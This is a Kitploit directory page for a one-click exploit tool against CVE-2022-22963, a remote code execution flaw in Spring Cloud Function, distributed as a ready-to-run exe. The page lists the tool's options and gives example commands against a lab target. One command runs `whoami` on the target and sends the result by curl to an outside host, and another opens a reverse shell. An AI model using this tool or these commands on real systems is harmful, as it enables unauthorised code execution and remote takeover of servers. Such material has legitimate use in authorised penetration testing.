Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-22963 — spring cloud function 一键利用工具! by charis 博客https://charis3306.top/ | Kitploit
Tools/GitHubGitHub/charis3306/cve-2022-22963
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubcharis3306/cve-2022-22963

CVE-2022-22963

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

View Repository
813 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-22963 (spring cloud function spel rce)

spring cloud function one-click exploitation tool! by charis

Blog https://charis3306.top/

Packaged as an exe file, ready to use out of the box

Command theme

root@kitploit:~
usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]

spring cloud function one-click exploitation tool! by charis Blog https://charis3306.top/

options:
  -h, --help         show this help message and exit
  --check CHECK      Detection method, post or get mode --check get --check post
  --route ROUTE      Detection route, default is functionRouter
  --url URL          Target URL to exploit
  --ip IP            IP address for reverse shell
  --port PORT        Port for reverse shell
  --proxies PROXIES  Enable proxy
  --cmd CMD          Command to execute

--check is mandatory

Help usage

root@kitploit:~
Spring-cloud-function-spel0.2.exe --help

image

Default detection: --check is mandatory, --route is the vulnerable route. Note: there may be false positives if detection is not performed via dnslog or sleep!

root@kitploit:~
Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top

image

Execute command to verify exploitability
root@kitploit:~
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --cmd "curl http://192.168.1.3:8080/`whoami`"

image

Reverse shell
root@kitploit:~
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --ip 192.168.1.3 --port 9999

image

If you like it, please give me a star

Feedback via Issues or email me at [email protected]

Download Tool